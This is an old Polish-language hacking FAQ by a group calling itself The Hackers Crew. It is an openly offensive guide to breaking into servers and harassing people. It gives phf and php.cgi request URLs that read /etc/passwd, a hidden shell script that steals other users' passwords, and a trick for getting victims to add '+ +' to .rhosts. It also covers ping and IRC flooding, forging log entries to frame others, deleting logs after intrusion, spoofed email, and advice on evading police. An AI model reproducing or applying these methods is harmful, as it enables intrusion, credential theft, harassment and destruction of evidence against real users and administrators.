		 TTTTTTTTTTTTTTTTTTT
		TTTTTTTTTTTTTTTTTTTTT
		T	TTTTT	    T
			TTTTT	HHHHH	 HHHHH
			TTTTT	 HHH	  HHH
			TTTTT	 HHH	  HHH      CCCCCCCCC
			TTTTT	 HHH	  HHH     CCC     CCC
			TTTTT	 HHH	  HHH    CCC        C
			TTTTT	 HHHHHHHHHHHH   CCC
			TTTTT	 HHHHHHHHHHHH  CCC
			TTTTT	 HHH	  HHH  CCC
			TTTTT	 HHH	  HHH   CCC
			TTTTT	 HHH	  HHH    CCC
		       TTTTTTT	 HHH	  HHH     CCC     CCC
		      TTTTTTTTT	HHHHH	 HHHHH     CCCCCCCCC

			T H E   H A C K E R S   C R E W

				 F A Q v. 1.4

			       sufur & lamentes
			    http://kki.net.pl/~thcpage

------------------------------------------------------------------------

				 SPIS TRESCI:

1. Informacje						(sufur+lamentes)
2. Bezpieczenstwo					(sufur+lamentes)
3. Hack Windows:
	3.1. Pakiet OOB					(sufur+lamentes)
	3.2. Skanowanie portow				(sufur+lamentes)
	3.3. Hasla					(sufur+lamentes)
4. Hack Linux/Unix:
	4.1. Hasla					(sufur+lamentes)
	4.2. Logger					(sufur+lamentes)
	4.3. Pozbywanie sie logow			(sufur+lamentes)
	4.4. Plik .rhosts				(sufur+lamentes)
	4.4. Dziura w adduser.cgi			(sufur+lamentes)
5. Hack Modem:
	5.1. Antykulturalny ping			(sufur+lamentes)
	5.2. Reset modemu				(sufur+lamentes)
6. Hack IRC:
	6.1. Wyciaganie danych				(sufur+lamentes)
	6.2. Excess Flood				(sufur+lamentes)
	6.3. Zalanie portu				(sufur+lamentes)
	6.4. Omijanie bana				(sufur+lamentes)
7. Bugi, dziury i inne:
	7.1. Anonimowe maile				(sufur+lamentes)
	7.2. Dziura w serwerze POP3			(sufur+lamentes)
	7.3. Bug w ksiegach gosci			(sufur+lamentes)
	7.4. Sendmaile					(sufur+lamentes)

------------------------------------------------------------------------

1. INFORMACJE						(sufur+lamentes)

	THC (The Hackers Crew) jest niedawno powstala grupa hackerska.
	Obejmuje dwie osoby: sufura i lamentesa. Osoby te sa znane wielu
	urzytkownikom Internetu, jednak pod innymi nickami, ktorych
	z powodu checi zachowania anonimowosci nie podajemy.
	Zaznaczamy, ze nie ponosimy odpowiedzialnosci za skutki, jakie
	wywolalo zapoznanie sie z informacjami zawartymi w niniejszym
	HACK FAQ. Informacje tutaj zawarte sluza jedynie celom
	edukacyjnym oraz pokazaniu niedoskonalosci systemow
	zabezpieczajacych.
	Nasza grupa zajmuje sie wszystkimi rzeczami zwiazanymi z
	hackerstwem - od denerwowania lamerow po wlamania.
	Ponizsze faq, jest przeznaczone wlasciwie dla wszystkich. Nawet
	tzw. lamer POWINIEN sie czegos z tad dowiedziec.
	Strona naszej grupy znajduje sie pod adresem
	http://kki.net.pl/~thcpage .

------------------------------------------------------------------------

2. BEZPIECZENSTWO					(sufur+lamentes)

	Bezpieczenstwo jest najwazniejszym zagadnieniem dla hackera.
	Nalezy pamietac, ze hackerstwo jest rzecza nielegalna, ktora
	podlega karaniu. Wszyscy slyszeli na pewno o ostatnim skazaniu
	studenta Politechniki Slaskiej z Gliwic, ktory wlamal sie do
	pewnej agencji prasowej i wykasowal im znaczna czesc danych.
	Aby uniknac podobnych sytuacji, pamietaj:

	- najlepiej korzystaj z dial-up'a TPSA - najtrudniej bedzie do	
	  Ciebie dotrzec
	- nie zostawiaj swoich danych (imienie, nazwiska, adresu,
	  telefonu, e-maila itd.)
	- badz podejrzliwy wobec wszystkich
	- nie ufaj nikomu, kogo dobrze nie znasz
	- nie mow o sobie nic osobom, ktorych dobrze nie znasz
	  (szczegolnie osobom, ktorych nie znasz na zywo)
	- nie kasuj bez sensu, czyli nie wyrzucaj danych bez powodu
	- pamietaj, ze wszystko o Twojej aktywnosci zapisuje sie w
	  logach systemowych, dlatego czysc logi po swojej dzialalnosci
	- nie wyciagaj pochopnych wnioskow na temat tego, kim jest ofiara
	- jezeli ktos Cie na mierzy, o niczym nie wiesz
	- jezeli beda pewni, ze to Ty cos namieszales, to udajesz glupka,
	  nie wiesz co zrobiles, bo Pawel z Warszawy Cie poprosil na IRC
	- jednym slowem, badz bardzo ostrozny!

	Stosowanie sie do powyzszych wskazowek powinno ochronic Cie przed
	ewentualnymi skutkami zabawy...

------------------------------------------------------------------------

3. HACK WINDOWS


3.1 Pakiet OOB:						(sufur+lamentes)

	Interesujace jest, ze Microsoft wciaz nie zamknal tej dziury
	przez dodanie patcha do IE. Pakiet OOB jest to pakiet, ktory
	zostaje wysylany na port 139 komputera, dzialajacego na systemie
	windows i powoduje on zatrzymanie wszystkich czynnosci sieciowych
	komputera zaatakowanego, przy czym na ekranie ofiary pokazuje
	sie niebieski ekran z "wyjatkiem krytycznym".
	Programami do wysylania pakietow OOB sa: winnuke, wingenocide
	(program, ktory atakuje bardzo duza liczbe komputerow na raz)
	itd. W celu zabezpieczenia sie przed atakiem OOB nalezy
	zainstalowac patcha lub poszperac w rejestrach windowsa.


3.2. Skanowanie portow:					(sufur+lamentes)

	Czestym zastosowaniem skanera portow jest proba zawieszenia
	komputera. Ustawienie zerowego opoznia miedzy otwieraniem
	poszczegolnych portow powoduje zwykle zawieszenie sie windowsa.
	Powstaly nawet programy otwierajace jak najwiecej portow ofiary
	w celu zawieszenia jej komputera. Przykladem jest program
	portfuck pod windowsa.


3.3. Hasla:						(sufur+lamentes)

	Hasla dostepu do windowsa przechowywane sa w jego katalogu
	glownym. Rozszerzeniem takiego pliku z haslem jest .pwl, a nazwa
	pliku jest nazwa urzytkownika. Istnieje bardzo duzo programow
	do rozkodowywania plikow pwl. Oprocz tego istenieja takze
	programy, ktore wyciagaja hasla uzyte przez uzytkownika do
	wejscia np. na jakis dysk sieciowy.


------------------------------------------------------------------------

4. HACK LINUX/UNIX


4.1. Hasla:						(sufur+lamentes)

	Hasla mozna zdobywac na wiele sposobow. Jezeli nie sa one
	zabezpieczone, wystarczy napisac:
	more /etc/passwd

	Wtedy zobaczymy spis wszystkich urzytkownikow, wraz z haslami i
	ich danymi. Przykladowa linijka pliku passwd wyglada tak:
	ktos:XIFBK43fDafdsa3:150:100:Ktos Ktosiowski:/home/ktos:/bin/bash

	Linijka ta oznacza, ze uzytkownik ktos ma haslo XIFBK43fDafdsa3,
	numer urzytkownika to 150, grupa dostepu to 100, prawdziwe dane
	to Ktos Ktosiowski, a katalog urzytkownika to /home/ktos.
	Haslo jest oczywiscie zakodowane i nalezy je rozkodowac. Sluza
	do tego programy takie jak np. John the Ripper. Ja osobiscie go
	uzywam (wersja 1.4).
	Jesli zamiast jakiegos ciagu znakow w miejscu hasla jest znaczek
	x, !, #, * lub jeszcze cos innego dziwnego, to oznacza to, ze
	hasla sa shadolowane i sa w /etc/shadow. Niestety plik ten jest
	jednym z najlepiej strzezonych w systemie, dlatego raczej nie uda
	sie nam go zdobyc. Jezeli juz Ci sie uda to zrobic, program John
	the Ripper v. 1.4 rozkodowuje takrze pliki shadow.
	Powyzsze sposoby wyciagniecia hasel moga sie przydac tylko tym,
	ktorzy maja konta shellowe na danym serwerze, lub dostep przez
	FTP do katalogu /etc/. Najczesciej jednak interesuje nas zdobycie
	hasel na serwerze, na ktorym nie mamy zadnego konta. Do tego celu
	mozna wykorzystac dziury w CGI serwera. Nalezy probowac wpisac
	taki adres:
	http://adres.ofiary/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

	albo
	http://adres.ofiary/cgi-bin/php.cgi?/etc/passwd

	Powyzsze przyklady dotycza wykorzystania dziur w phf i php. Adres
	pliku /etc/passwd jest tylko przykladowym, poniewaz mozna go
	zastapic innym plikiem, ktorego zawartosc chcemy zobaczyc.
	Jezeli uda Ci sie zdobyc na jakims serwerze haslo roota, mozesz
	nadac sobie uprawnienia roota poprzez zmiane grupy dostepu
	swojego konta na 0. Mozna takze dodac do pliku passwd bylejakiego
	urzytkownika bez hasla o grupie dostepu 0 (wystarczy dopisac
	jedna linijke j.w.).
	Mozna tego dokonac wykorzystyjac dziury np. w sendmailu.


4.2. Logger:						(sufur+lamentes)

	Jezeli chcesz cos upamietnic w pliku /var/adm/user.log (do tego
	pliku dostep do odczytu i zapisu ma tylko admin) mozesz tego
	dokonac i to nawet anonimowo. Do tego sluzy program logger,
	jednak z opcja -t powoduje wpisanie logu jako ktos, kogo sam
	podasz. Mozna w ten sposob kogos osmieszyc, wkopac itd.
	Program logger uzywa sie nastepujaco:
	logger -t "Urzytkownik ktory ma byc wpisany" "tresc wiadomosci"

	W ten sposob mozna dodac linijke do pliku /var/adm/user.log.
	Oczywiscie kto powiedzial ze tylko jedna? Program logger moze
	miec zastosowanie np. na serwerze szkolnym gdzie mozesz wpisc
	logger -t "Uczen buntownik" "Dyrektor to idiota!"

	Nalezy pamietac, ze aby moc korzystac z loggera trzeba miec
	konto shellowe.


4.3. Pozbywanie sie logow:				(sufur+lamentes)

	Do pozbywania sie logow zostalo napisanych wiele programow,
	jednak najlepiej pozbywac sie wszelkich informacji o naszej
	dzialalnosci recznie czyli przez wyrzucanie poszczegolnych
	linijek z plikow w kartotece /var. W zaleznosci od tego przez
	co sie wlamalismy, musimy wyrzucic odpowiednie linijki z
	odpowiednich plikow. Dla przykladu, jezeli wlamywalismy sie przez
	sendmaila, to nalezy wyrzucic odpowiedni linijki z plikow:
	/var/adm/mail.log
	/var/adm/mail.warn
	/var/adm/mail.info
	/var/log/mail.log
	/var/log/mail.warn
	/var/log/mail.info

	Oprocz tego, jesli cos nam sie nie udawalo przedtem to jeszcze
	nalezy wyrzucic odpowiednie linijki z plikow:
	/var/adm/mail.err
	/var/log/mail.err


4.4. Plik .rhosts:					(sufur+lamentes)

	W pliku .rhosts, na koncie shellowym zapisane sa adresy hostow,
	ktore sa zaufane dla danego konta, czyli hostow, z ktorych mozna
	wchodzic na dane konto bez podania hasla. Jezeli uzytkownik
	jest lamerem i siedzi na koncie shellowym, mozesz poprosic go,
	zeby napisal:
	echo "+ +" >> .rhosts

	Spowoduje to, ze wszystkie hosty beda zaufane dla jego konta.
	Dzieki temu, bedziesz mogl wejsc na jego konto bez podania hasla.
	Linijke z dwoma plusami mozna takze dopisac, gdy ktos da Ci haslo
	zebys cos mu zrobil. Jezeli osobka z konta shellowego jest na IRC
	i jest lamerem, mozna ja poprosic, zeby wpisala:
	/exec echo "+ +" >> .rhosts

	Spowoduje to to samo co w pierwszym przykladzie, czyli dopisze do
	.rhosts linijke z + +.


4.4. Dziura w adduser.cgi (nazwa skryptu przykladowa):	(sufur+lamentes)

	Skrypt adduser.cgi sluzy do zakladania kont przez WWW. Aby
	wykorzystac dziure w tym skrypcie, trzeba miec konto z sh na
	danym serwerze. Dziura ta polega na tym, ze skrypt, zakladajac
	konto kopiuje tymczasowo usera, haslo, UID, GID, informacje itd.
	do pliku /home/nobody/users (sciezka i nazwa pliku jest
	oczywiscie przykladowa, aby sprawdzic jaka jest na danym
	serwerze, nalezy zajrzec do pliku skryptu i zobaczyc jaki jest
	jego tymczasowy	katalog). Najwazniejsze jest to, ze dane na
	temat kolejki kont do zakladania w tym pliku sa niezakodowane
	i do tego w postaci linijki takiej jak w pliku passwd. Po
	zalozeniu kont, zawartosc pliku users jest automatycznie
	kasowana, dlatego najlepiej napisac krotki skrypt, ktory co 20
	sekund kopiowalby zawartosc pliku z kolejka do jakiegos Twojego
	pliku.
	Taki skrypcik moglby wygladac przykladowo tak (nazwa skryptu to
	hasla.sh):
	#! /bin/sh
	cat /home/nobody/users >> haselka.txt
	sleep 20
	nohup ./hasla.sh &

	Program ten nalezy odpalic komenda:
	nohup ./hasla.sh &

	Wazne jest to, zeby zmienic nazwy plikow. Adminowi nie rzuci sie
	wtedy w oczy shell z uruchomionym skryptem hasla.sh.
	W ten prosciutki sposob mozemy zdobyc hasla kazdego. Mozna np.
	zaprosic kogos do zalozenia konta na jakims darmowym shellowym
	serwerze i w w/w sposob, dobrac sie do jego haselka.

------------------------------------------------------------------------

5. HACK MODEM:


5.1. Antykulturalny ping:				(sufur+lamentes)

	Jezeli posiadasz konto shellowe na jakims serwerze z szybkim
	laczem (powiedzmy, ze wystarczy 2Mbps na osobke, ktory laczy sie
	ppp przez modem niezbyt szybkim (okolo 115kbps), wystarczy wpisac
	na shellu:
	ping -s 20000 IP/adres

	Oczywiscie liczbe po -s mozna zastapic inna liczba. Jest to ilosc
	bajtow, na ktore dany IP/adres ma odpowiedziec. Liczba ta, nie
	moze byc wieksza nic 64000. Po takim ataku atakowana osobka nie
	bedzie mogla nic robic. Testowalem na koledze, ktory ma modem
	56kbps i na tyle sie polaczyl z TPSA. Po tym, jak na ekranie
	pokazalo mi sie, ze jego odpowiedz doszla po 15	sekundach, on
	nie mogl nawet wejsc na kanal przez polski IRCNET. Pingi
	wysylalem z lacza o przepustowosci 2Mbps.


5.3. Reset modemu:					(sufur+lamentes)

	Komenda +++ath0 powoduje reset modemu. Wyslanie listu
	zawierajacego taka linijke osobie bedacej na modemie moze
	rozlaczyc jej modem. Niestety dziala to na starych modemach i to
	nie na wszystkich.

------------------------------------------------------------------------

6. HACK IRC


6.1. Wyciaganie danych:					(sufur+lamentes)

	Dane o uzytkownikow mozna wyciagac na wiele sposobow. Znanym
	przez wszystkich jest:
	/whois nick

	Nie dostarcza on jesnak zbyt wielu wiadomosci. Czesto
	potrzebujemy poznac czyjs numer IP. Do tego sluzy polecenie:
	/dns nick

	Zwykle nie dziala to niestety. Wtedy nalezy uzyc polecenia
	linuxowego (np. na jakims koncie shellowym):
	nslookup adres

	Nastepnym sposobem sprawdzenia numeru IP jest spingowanie kogos
	z pod linuxa. Rowniez to dostarcza nemeru IP.
	Jezeli chcesz wiedziec jak dana osoba sie nazywa i ta osoba
	siedzi na jakims koncie shellowym, to mozna wejsc na port 25
	jego serwera i napisac vrfy nick.
	Jezeli masz konto na tym samym serwerze co sprawdzana osoba,
	nalezy uzyc polecenia:
	finger nick

	Innym sposobem sciagania danych o osobie z IRC moze byc CTCP.
	Kilka przydatnich zastosowan:
	/ctcp nick finger
	/ctcp nick version
	/ctcp nick system
	/ctcp nick userinfo


6.2. Excess Flood:					(sufur+lamentes)

	Jednym ze sposobow wyrzucenia kogos z IRC jest wywolanie u niego
	Excess Flooda, czyli spowodowania powtarzajacego sie wysylania
	pakietow. Pakiety wymagajace odpowiedzi to ctcp finger, ctcp
	ping, ctcp version itd. Wysylajac ich duzo, w bardzo krotkich
	przeciagach czasu i z wielu sesji (tak zeby nie wyrzucilo naszych
	sesji) osoba atakowana, bedzie musiala na nie wszystkie
	odpowiedziec, a ze jest jedna, a musi odpowiedziec kilku sesjom
	serwer potraktuje to jako flood i wyrzuci uzytkownika z IRC
	z quit msg "Excess Flood". Problemem jest to, zeby wysylac
	z wielu sesji naraz pakiety ctcp. Mozna to zrobic przez napisanie
	odpowiedniego skryptu pod linuxem, jednak ostatnio zetknalem sie
	z takim programem pod windowsa. Nazywa sie EF29. Oprocz tego,
	nalezy pamietac, ze jeden uzytkownik moze uruchomic co najwyzej
	3 klony na danym serwerze. Dlatego nalezy spisac ich sobie jak
	najwiecej.
	Excess Flood ma zastosowanie wobez zwyklych uzytkownikow oraz
	botow i screenow. Nie zawsze jednak to dziala poniewaz niektorzy
	(w szczegolnosci boty) maja ochrone na ctcp flood.


6.3. Zalanie portu:					(sufur+lamentes)

	Nastepnym ze sposobow wyrzucenia kogos z IRC jest zalanie portu
	na ktorym wisi jego klient IRC'a. Chodzi tu glownie o windows.
	Aby sprawdzic na jakim porcie siedzi jego klient IRC'a, nalezy
	odpalic skaner portow. Zwykle jest to port 59. Port na ktorym
	siedzi IRC charakteryzuje sie tym, ze po podlaczeniu do niego
	telnetem, nic sie nie dzieje, a po wpisaniu czegos i nacisnieciu
	enter, polaczenie sie zrywa. Nastepnie nalezy albo napisac skrypt
	pod linuxem, ktory bedzie podlaczal sie i rozlaczal bez przerwy
	do tego portu lub wlaczyc program windowsowy, ktory sam to robi.
	Z wlasnego doswiadczenia wiem, ze dziala to na mIRC'a.


6.4. Omijanie bana:					(sufur+lamentes)

	Z omijaniem bana nie ma problemow jezeli korzysta sie z
	dial-up'u TPSA. Jezeli chodzi o lacze stale, jest to juz wiekszy
	problem.
	Jezeli dostaniesz bana bedac na TPSA, to najpierw sprobuj zmienic
	usera i nicka w kliencie IRC'a i podlacz sie ponownie do serwera
	IRC. Jesli to nic nie da, bedzie to oznaczac, ze dostales bana
	na adres. W celu ominieca bana musisz zrestartowac polaczenie z
	TPSA i oprocz tego na wszelki wypadek zmien tez usera i nicka w
	kliencie IRC'a. To zadziala na 100%.
	Jezeli jestes podlaczony laczem stalym, to najpierw zmien sobie
	usera i nicka w kliencie IRC'a i polacz sie ponownie z serwerem
	IRC'a. Jezeli to nie pomoze, nie wejdziesz ze swojego adresu.
	Mozna wtedy zmienic swoj adres wykorzystujac IRC'owy spoofer, lub
	wchodzac na IRC z jakiegos serwera shellowego gdzie jest klient
	IRC'a. Oprocz tego niektore serwery udostepniaja wejscie na IRC
	przez polaczenie sie telnetem na odpowiedni port (np.
	dragonlair.dal.net). 

------------------------------------------------------------------------

7. BUGI, DZIURY I INNE


7.1. Anonimowe maile:					(sufur+lamentes)

	Jezeli chcesz powiedziec komus co o nim myslisz i nie chcesz,
	zeby ten ktos wiedzial, ze to Ty mu napisales, jest mozliwosc
	wyslania mu anonimowego maila. W tym celu, nalezy zatelnetowac
	sie na port 25 byle jakiego serwera pocztowego (np. kki.net.pl)
	i postepowac zgodnie z instrukcja:
	helo kretyn
	mail from: adres@pod.jakim.chcesz.byc.widziany.com
	rcpt to: ofiara@zartu.com
	data
	tesc listu
	.
	quit

	W ten prosty sposob wyslales gosciowi anonimowego maila, jednak
	czy aby w 100% anonimowego? Otoz nie, poniwaz serwer dopisuje
	do listu adres serwera, z ktorego dostal ten list. W celu
	odsuniecia od siebie podejrzen, nalezy zatelnetowac sie na jakis
	serwer z shellem i z niego telnetowac sie na serwer pocztowy.
	To takze nie daje 100% anonimowosci, jednak bardzo zmniejsza
	prawdopodobienstwo dotarcia do Ciebie. Nie daje 100% anonimowosci
	poniewaz w logach serwera shellowego zostaje log z data, godzina
	i innymi smieciami, mowiacy o tym, ze wyslales jakis list. Moze
	to byc dowod, ale nie wydaje mi sie, zeby komu kolwiek chcialo
	sie tak gleboko szperac, zeby dowiedziec sie od kogo dostal glupi
	list.


7.2. Dziura w serwerze POP3:				(sufur+lamentes)

	Wlasciwie nie wiem, dlaczego to dziala, ale jednak dziala.
	Ostatnio dostalem list, w ktorym ktos tak dziwnie pisal, ze
	kropka byla pisana tak: tresc listu . nowe zdanie.<enter>
	Tak niefortunnie sie zlozylo, ze kropka ta znalazla sie w osobnej
	linijce przy pobieraniu poczty i serwer potraktowal kropke jako
	koniec listu a reszte jako komendy, ktore ma wykonac. W wyniku
	tego, moj Outlook napisal blad serwera, i jako odpowiedz serwera
	wypisal nastepna linijke listu. Jezeli chodzi o pine, to nie
	poskutkowalo to tak jak na Outlooka. Troche to dziwne, ale jednak
	mialo miejsce. Jednym slowem osoba, ktora wyslala mi ten list,
	nieswiadomie wykryla nastepna dziure.
	Zastosowanie tej dziurki moze byc nastepujace: mozna wyslac list
	o zawartosci j.w., tylko ze po kropce i enterze mozna umiescic
	np. quit. Jest to jednak troche bez sensu, poniewaz mozna napisac
	tam cokolwiek, nasz Outlook i tak nie pobierze nastepnych
	wiadomosci i trzeba bedzie wyproznic skrzynke, co dla lamera
	jest rzecza trudna.


7.3. Bug w ksiegach gosci:				(sufur+lamentes)

	Bug w ksiegach gosci (np. w ksiegach oferowanych przez serwer
	ib.torun.pl) polega na tym, ze wpis mozna zastapic kodem HTML.
	Dla tych, ktorzy nie znaja HTML'a moge dodac, ze aby zwiekszyc
	czcionke, ktora ma byc dokonany wpis, nalezy napisac:
	<H1>Teskst zwiekszony</H1>

	Mozna tez zmieniac kolor:
	<H1><FONT COLOR=RED>Tekst zwiekszony, czerwony</FONT></H1>

	Jezeli chcesz wiedziec wiecej o HTML, polecam strone z kursem
	tego jezyka:
	http://www.pckurier.pl/html 

	W ten sposob mozna dokonac naprawde "pamietnego" wpisu.


7.4. Sendmaile:						(sufur+lamentes)

	Poniewaz na dziury w sendmailach wciaz wychadza patche,
	postanowilem nie opisywac ich tutaj, tym bardziej, ze nie sa to
	w zadnym wypadku moje pomysly. Oprocz tego istnieje bardzo malo
	serwerow, ktore nie maja zpatchowanych dziur w sendmailu.
	Adminami serwerow z dziurami w senmailach sa glownie lamerami, a
	to sie rzadko zdaza.

------------------------------------------------------------------------

Na razie tyle. Bedziemy aktualizowac to faq tak czesto, jak bedzie to
mozliwe. Nowa wersja faq (wraz z innymi i zbiorem przydatnych programow)
jest zawsze dostepna na naszej stronie pod adresem
http://kki.net.pl/~thcpage .

							sufur & lamentes
